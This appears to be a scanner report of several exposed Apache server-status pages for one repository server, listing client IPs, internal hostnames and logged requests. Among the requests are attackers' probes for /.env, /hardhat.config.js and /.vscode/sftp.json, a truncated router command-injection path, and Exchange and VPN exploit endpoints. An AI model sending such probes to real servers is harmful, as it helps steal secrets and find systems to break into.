0-127153890/1/465_ 0.0699602501660.00.00442.63 184.105.139.67http/1.1 0-127153890/5/492_ 0.8312348400460.00.022663.89 64.226.78.121http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-127153890/3/731_ 0.781394014035060.00.017256.45 195.154.87.70http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-127153890/3/504_ 0.501015013720.00.00133763.78 64.226.78.121http/1.1 0-127153890/6/523_ 0.8371402913100.00.01411.06 62.138.14.216http/1.1vm-repo-prd.nimoz.local:80GET /hardhat.config.js HTTP/1.0 0-127153890/4/457_ 0.839963121871690.00.03115446.12 85.190.240.67http/1.1repo.nimoz.pl:443GET /.env HTTP/1.1 0-127153890/4/435_ 0.761316868020.00.0363975.02 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-127153890/2/517_ 0.0712625449290.00.012800.37 35.240.121.17http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-127153900/2/172_ 0.18139441371660.00.032.62 167.71.41.198http/1.1repo.nimoz.pl:443GET /odinhttpcall1717233021 HTTP/1.1 1-127153900/1/159_ 0.2499623144720.00.021.63 85.190.240.67http/1.1repo.nimoz.pl:443POST / HTTP/1.1 1-127153900/1/134_ 0.1999620174970.00.015.20 167.71.41.198http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-127153900/0/208_ 0.00124412540.00.003.76 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-127153900/0/1910_ 0.0012262216200.00.0028259.22 64.226.78.121h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-127153900/0/163_ 0.00002877330.00.002.08 64.226.78.121http/1.1 1-127153900/1/141_ 0.15392124166710.00.012.15 185.242.226.10http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-127153900/0/151_ 0.00348629443500.00.0067.44 198.235.24.182http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-127153900/1/142_ 0.078150253680420.00.01346.51 179.43.185.130http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-127153900/0/187_ 0.00029250440.00.003.37 159.65.168.103http/1.1 1-127153900/3/136_ 0.27017475010.00.0177.00 64.226.78.121http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 1-127153900/0/177_ 0.00815022757070.00.0060.07 93.174.95.106http/1.1 1-127153900/0/156_ 0.00348622253120.00.002.49 185.242.226.10http/1.1 1-127153900/2/155_ 0.1459271236040.00.021.71 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-127153900/0/150_ 0.00592703617240.00.00345.98 185.242.226.10http/1.1 1-127153900/0/127W 0.0000423200.00.0086.38 64.226.78.121http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 1-127153900/1/201_ 0.0800333840.00.002.67 157.230.30.241h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-127153900/0/171_ 0.00348408031940.00.00896.84 179.43.185.130http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-127153900/1/149_ 0.2313990190500.00.001.68 45.86.86.249http/1.1vm-repo-prd.nimoz.local:80GET /.env HTTP/1.1 1-127153900/3/154_ 0.2313990156950.00.021.56 45.86.86.249http/1.1vm-repo-prd.nimoz.local:80POST / HTTP/1.1 1-127153900/2/181_ 0.14392105280950.00.02427.00 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-127153900/2/192_ 0.2701741343560.00.032038.19 64.226.78.121http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-127153900/2/161_ 0.27020141990.00.011.42 64.226.78.121http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 1-127153900/0/259_ 0.001394022038510.00.002891.42 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-127153900/1/176_ 0.08109470836320.00.0081.32 184.105.139.67http/1.1 2-126-0/0/834. 0.0054226018051050.00.00903.55 128.199.182.152http/1.1 2-126-0/0/704. 0.0054226023137270.00.00
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe448c93dd63e
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Friday, 31-May-2024 22:02:58 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 127 Parent Server MPM Generation: 126 Server uptime: 126 days 11 hours 56 minutes 55 seconds Server load: 0.00 0.00 0.00 Total accesses: 42960 - Total Traffic: 750.4 GB - Total Duration: 118592210 CPU Usage: u59.89 s144.05 cu1004.1 cs689.5 - .0174% CPU load .00393 requests/sec - 72.0 kB/second - 17.9 MB/request - 2760.53 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 212273no0yes124000 312274no0yes025000 Sum200 149000 ..................................................______________ ______W_____________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-123-0/0/443. 0.002521730827380.00.00131.41 185.242.226.80http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-123-0/0/482. 0.00252173191060640.00.006.17 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/493. 0.00252173078241060.00.00132866.31 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-123-0/0/1510. 0.0025217332189850790.00.0024866.02 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/463. 0.00252173278766680.00.001437.80 13.83.43.95http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-123-0/0/514. 0.00252173041364730.00.002234.35 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/419. 0.00252173205533530.00.0034602.47 172.212.58.155http/1.1 0-123-0/0/533. 0.002521732032370090.00.003141.61 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/469. 0.002521732111684520.00.002054.19 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/494. 0.00252173264967520.00.00365.65 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/474. 0.002521732623520950.00.0037040.69 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/440. 0.0025217303986090.00.00348.50 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/499. 0.002521731939212120.00.0059395.25 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/474. 0.00252173181488720.00.0061.45 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/472. 0.00252173028239410.00.001477.11 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/462. 0.00252173274518660.00.002566.05 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/444. 0.0025217306566480.00.00541.80 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/464. 0.0025217302501660.00.00442.63 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/487. 0.00252173048400230.00.002663.88 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/728. 0.002521732514034830.00.007256.44 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/501. 0.00252173015013720.00.00133763.78 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/517. 0.0025217302913100.00.00411.05 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/453. 0.00252173021871040.00.00115446.09 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/431. 0.0025217306867680.00.0063975.00 185.242.226.80http/1.1 0-123-0/0/515. 0.00252173025449020.00.002800.35 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/170. 0.0025217323371030.00.002.60 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/158. 0.002521737144480.00.001.62 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/133. 0.0025217321174760.00.005.19 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/208. 0.0025217324412540.00.003.76 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/1910. 0.002521732262216200.00.0028259.22 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/163. 0.0025217302877330.00.002.08 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/140. 0.002521730166460.00.002.14 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/151. 0.0025217329443500.00.0067.44 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/141. 0.00252173203680160.00.00346.49 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/187. 0.0025217329250440.00.003.37 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/133. 0.0025217322474830.00.0076.99 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/177. 0.0025217322757070.00.0060.07 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/156. 0.0025217322253120.00.002.49 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/153. 0.0025217324235810.00.001.69 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/150. 0.0025217303617240.00.00345.98 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/127. 0.0025217321423200.00.0086.38 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/200. 0.002521732333830.00.002.67 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/171. 0.0025217308031940.00.00896.84 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/148. 0.0025217317190500.00.001.68 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/151. 0.0025217321156440.00.001.54 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/179. 0.00252173265280660.00.00426.98 185.242.226.80http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-123-0/0/190. 0.002521732541343160.00.002038.15 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/159. 0.002521730141790.00.001.41 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/259. 0.00252173022038510.00.002891.42 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-123-0/0/175. 0.0025217333836320.00.0081.32 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 2-126122730/4/834_ 0.8611018051050.00.00903.55 128.199.182.152http/1.1 2-126122730/5/704_ 0.809023137270.00.036317.58 128.199.182.152h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst)
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe4484efc297a
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Wednesday, 29-May-2024 23:32:16 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 125 Parent Server MPM Generation: 124 Server uptime: 124 days 13 hours 26 minutes 14 seconds Server load: 0.00 0.00 0.00 Total accesses: 42664 - Total Traffic: 750.4 GB - Total Duration: 118588439 CPU Usage: u59.94 s141.93 cu1000.46 cs689.17 - .0176% CPU load .00396 requests/sec - 73.1 kB/second - 18.0 MB/request - 2779.59 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 26172no0yes025000 36173no0yes124000 Sum200 149000 ..................................................______________ ________________________W___________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-123-0/0/443. 0.00847310827380.00.00131.41 185.242.226.80http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-123-0/0/482. 0.0084731191060640.00.006.17 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/493. 0.0084731078241060.00.00132866.31 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&co 0-123-0/0/1510. 0.008473132189850790.00.0024866.02 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/463. 0.0084731278766680.00.001437.80 13.83.43.95http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-123-0/0/514. 0.0084731041364730.00.002234.35 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/419. 0.0084731205533530.00.0034602.47 172.212.58.155http/1.1 0-123-0/0/533. 0.00847312032370090.00.003141.61 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/469. 0.00847312111684520.00.002054.19 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/494. 0.0084731264967520.00.00365.65 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/474. 0.00847312623520950.00.0037040.69 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/440. 0.008473103986090.00.00348.50 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/499. 0.00847311939212120.00.0059395.25 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/474. 0.0084731181488720.00.0061.45 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/472. 0.0084731028239410.00.001477.11 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/462. 0.0084731274518660.00.002566.05 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/444. 0.008473106566480.00.00541.80 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/464. 0.008473102501660.00.00442.63 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/487. 0.0084731048400230.00.002663.88 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/728. 0.00847312514034830.00.007256.44 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/501. 0.0084731015013720.00.00133763.78 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/517. 0.008473102913100.00.00411.05 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/453. 0.0084731021871040.00.00115446.09 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 0-123-0/0/431. 0.008473106867680.00.0063975.00 185.242.226.80http/1.1 0-123-0/0/515. 0.0084731025449020.00.002800.35 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/170. 0.008473123371030.00.002.60 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/158. 0.00847317144480.00.001.62 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/133. 0.008473121174760.00.005.19 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/208. 0.008473124412540.00.003.76 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/1910. 0.00847312262216200.00.0028259.22 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/163. 0.008473102877330.00.002.08 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/140. 0.00847310166460.00.002.14 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/151. 0.008473129443500.00.0067.44 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/141. 0.0084731203680160.00.00346.49 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/187. 0.008473129250440.00.003.37 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/133. 0.008473122474830.00.0076.99 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/177. 0.008473122757070.00.0060.07 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/156. 0.008473122253120.00.002.49 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/153. 0.008473124235810.00.001.69 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/150. 0.008473103617240.00.00345.98 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/127. 0.008473121423200.00.0086.38 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/200. 0.00847312333830.00.002.67 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/171. 0.008473108031940.00.00896.84 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/148. 0.008473117190500.00.001.68 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/151. 0.008473121156440.00.001.54 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/179. 0.0084731265280660.00.00426.98 185.242.226.80http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-123-0/0/190. 0.00847312541343160.00.002038.15 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/159. 0.00847310141790.00.001.41 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 1-123-0/0/259. 0.0084731022038510.00.002891.42 31.220.1.83http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-123-0/0/175. 0.008473133836320.00.0081.32 54.38.126.105http/1.1repo.nimoz.pl:443GET / HTTP/1.0 2-12461720/19/819_ 1.5010212318050600.00.07903.52 45.156.128.43http/1.1repo.nimoz.pl:443GET / HTTP/1.1 2-12461720/19/698_ 1.461021023136650.00.036317.55 45.142.182.121http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe44832c19d5e
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Tuesday, 28-May-2024 22:43:57 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 124 Parent Server MPM Generation: 123 Server uptime: 123 days 12 hours 37 minutes 54 seconds Server load: 0.00 0.00 0.00 Total accesses: 41907 - Total Traffic: 750.4 GB - Total Duration: 118584470 CPU Usage: u58.96 s140.52 cu998.59 cs688.95 - .0177% CPU load .00393 requests/sec - 73.7 kB/second - 18.3 MB/request - 2829.71 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 03149no0yes025000 13150no0yes124000 Sum200 149000 _________________________________________W________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-12331490/4/442_ 0.9521281827380.00.02131.41 87.121.69.52http/1.1 0-12331490/5/481_ 1.21212801060440.00.066.16 87.121.69.52http/1.1vm-repo-prd.nimoz.local:80CONNECT google.com:443 HTTP/1.1 0-12331490/4/491_ 1.1622372578240850.00.02132866.30 185.180.140.5http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-12331490/3/1510_ 0.95223732189850790.00.4824866.02 198.235.24.103http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 0-12331490/5/462_ 1.10261008766400.00.031437.79 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-12331490/8/514_ 1.212242041364730.00.022234.35 146.19.24.28http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 0-12331490/6/418_ 1.212611305533330.00.0734602.46 4.151.218.131http/1.1repo.nimoz.pl:443GET /owa/auth/x.js HTTP/1.1 0-12331490/4/532_ 0.852813032369880.00.023141.60 46.35.232.145http/1.1 0-12331490/6/469_ 1.2902111684520.00.032054.19 165.227.173.41http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-12331490/4/494_ 1.281264967520.00.04365.65 165.227.173.41http/1.1repo.nimoz.pl:443GET /debug/default/view?panel=config HTTP/1.1 0-12331490/6/474_ 1.1912623520950.00.0237040.69 91.92.249.130http/1.1repo.nimoz.pl:443GET /global-protect/login.esp HTTP/1.1 0-12331490/2/440_ 0.85203986090.00.01348.50 199.45.154.73http/1.1 0-12331490/5/499_ 1.2711939212120.00.0459395.25 165.227.173.41http/1.1repo.nimoz.pl:443GET /.vscode/sftp.json HTTP/1.1 0-12331490/7/474_ 1.272181488720.00.0661.45 165.227.173.41http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-12331490/3/472_ 1.182028239410.00.001477.11 165.227.173.41http/1.1 0-12331490/4/462_ 1.102274518660.00.032566.05 165.227.173.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-12331490/3/444_ 1.18306566480.00.00541.80 165.227.173.41http/1.1 0-12331490/5/464_ 1.08302501660.00.03442.63 165.227.173.41http/1.1 0-12331490/4/487_ 1.103048400230.00.012663.88 165.227.173.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-12331490/5/728_ 1.1232514034830.00.027256.44 165.227.173.41http/1.1 0-12331490/4/501_ 1.163015013720.00.00133763.78 165.227.173.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-12331490/3/516_ 0.473272913090.00.03411.04 87.121.69.52http/1.1 0-12331490/9/452_ 1.2232921871040.00.05115446.09 165.227.173.41http/1.1repo.nimoz.pl:443GET / HTTP/1.1 0-12331490/7/431_ 1.21106006867680.00.0263975.00 174.138.64.126http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.0 0-12331490/5/515_ 0.851060025449020.00.042800.35 137.184.204.57h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12331500/2/169_ 0.391039321370790.00.062.58 199.45.154.73http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-12331500/2/158_ 0.16126927144480.00.011.62 35.203.211.185http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-12331500/1/132_ 0.02103930174550.00.005.18 104.152.52.200http/1.1 1-12331500/3/208_ 0.301038124412540.00.033.76 199.45.154.73http/1.1 1-12331500/2/1909_ 0.28103772562215980.00.0328259.21 199.45.154.73http/1.1 1-12331500/1/163_ 0.26514802877330.00.002.08 179.43.185.130http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-12331500/0/140_ 0.0051480166460.00.002.14 137.184.204.57h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12331500/2/151_ 0.41337929443500.00.0267.44 185.242.226.80http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-12331500/3/141_ 0.353379203680160.00.48346.49 137.184.204.57http/1.1repo.nimoz.pl:443GET / HTTP/1.1 1-12331500/1/186_ 0.41281323250140.00.013.35 91.92.249.130http/1.1repo.nimoz.pl:443GET /+CSCOE+/logon.html HTTP/1.1 1-12331500/4/133_ 0.36281322474830.00.0676.99 137.184.204.57http/1.1repo.nimoz.pl:443GET /t4 HTTP/1.1 1-12331500/2/177_ 0.43281322757070.00.0160.07 91.92.249.130http/1.1repo.nimoz.pl:443GET /dana-na/auth/url_default/welcome.cgi HTTP/1.1 1-12331500/2/155_ 0.28126920252890.00.022.48 179.43.185.130http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-12331500/1/153_ 0.152407224235810.00.021.69 216.218.206.68http/1.1 1-12331500/0/150_ 0.002407203617240.00.00345.98 168.76.20.229http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-12331500/1/126_ 0.26240730422990.00.0086.37 185.180.143.6http/1.1vm-repo-prd.nimoz.local:80GET /cf_scripts/scripts/ajax/ckeditor/ckeditor.js HTTP/1.1 1-12331500/1/199W 0.2800333810.00.002.66 165.227.173.41http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 1-12331500/2/171_ 0.25008031940.00.00896.84 205.210.31.90http/1.1vm-repo-prd.nimoz.local:80\x16\x03\x01 1-12331500/1/148_ 0.47017190500.00.011.68 165.227.173.41http/1.1repo.nimoz.pl:443GET /v2/_catalog HTTP/1.1 1-12331500/3/151_ 0.47121156440.00.021.54 165.227.173.41http/1.1repo.nimoz.pl:443GET /about HTTP/1.1 1-12331500/2/178_ 0.382225280400.00.02426.96 165.227.173.41http/1.1 1-12331500/2/190_ 0.4622541343160.00.012038.15 165.227.173.41http/1.1repo.nimoz.pl:443GET /server HTTP/1.1 1-12331500/1/159_ 0.2620141790.00.001.41 165.227.173.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12331500/1/259_ 0.263022038510.00.002891.42 165.227.173.41h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 1-12331500/4/175_ 0.37281333836320.00.0281.32 137.184.204.57http/1.1repo.nimoz.pl:443GET / HTTP/1.1 2-120-0/0/800. 0.00254631018049910.00.00903.45 185.191.126.213http/1.1vm-repo-prd.nimoz.local:80GET / HTTP/1.1 2-120-0/0/679. 0.00254631023136400.00.006317.52 87.12
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31b23fe448b23fe44884b4fac9
Apache Status Apache Server Status for 148.81.110.91 (via 10.3.10.10) Server Version: Apache/2.4.38 (Debian) OpenSSL/1.1.1d Server MPM: event Server Built: 2021-06-10T10:13:06 Current Time: Monday, 27-May-2024 22:15:45 CEST Restart Time: Friday, 26-Jan-2024 09:06:02 CET Parent Server Config. Generation: 123 Parent Server MPM Generation: 122 Server uptime: 122 days 12 hours 9 minutes 42 seconds Server load: 0.00 0.00 0.00 Total accesses: 41731 - Total Traffic: 750.3 GB - Total Duration: 118581661 CPU Usage: u58.3 s139.45 cu997.12 cs688.73 - .0178% CPU load .00394 requests/sec - 74.3 kB/second - 18.4 MB/request - 2841.57 ms/request 1 requests currently being processed, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusyidlewritingkeep-aliveclosing 032509no0yes124000 132510no0yes025000 Sum200 149000 ________W_________________________________________.............. ................................................................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-122325090/5/437_ 1.031230826910.00.04131.38 185.142.236.43http/1.1repo.nimoz.pl:443GET /robots.txt HTTP/1.1 0-122325090/2/475_ 1.04121241059070.00.016.09 185.142.236.43http/1.1repo.nimoz.pl:443GET /.well-known/security.txt HTTP/1.1 0-122325090/2/486_ 0.66120078240410.00.00132866.27 185.142.236.43http/1.1 0-122325090/5/1506_ 0.451170189841250.00.0224865.53 13.91.182.218h2done, streams: 0/0/0/0/0 (open/recv/resp/push/rst) 0-122325090/1/456_ 0.21115288765950.00.011437.74 185.142.236.43http/1.1repo.nimoz.pl:443\n 0-122325090/3/505_ 0.45114041364130.00.022234.32 185.142.236.43http/1.1 0-122325090/3/412_ 0.8912805532190.00.0034602.39 185.142.236.43http/1.1 0-122325090/4/527_ 0.651292632369390.00.063141.57 185.142.236.43http/1.1repo.nimoz.pl:443\n 0-122325090/0/462W 0.000011683990.00.002054.15 64.226.65.160http/1.1repo.nimoz.pl:443GET /server-status HTTP/1.1 0-122325090/7/490_ 1.170224966630.00.07365.61 64.226.65.160http/1.1repo.nimoz.pl:443GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-122325090/2/468_ 0.350023520680.00.0037040.68 185.142.236.43http/1.1 0-122325090/3/438_ 1.170233985850.00.01348.49 64.226.65.160http/1.1repo.nimoz.pl:443GET 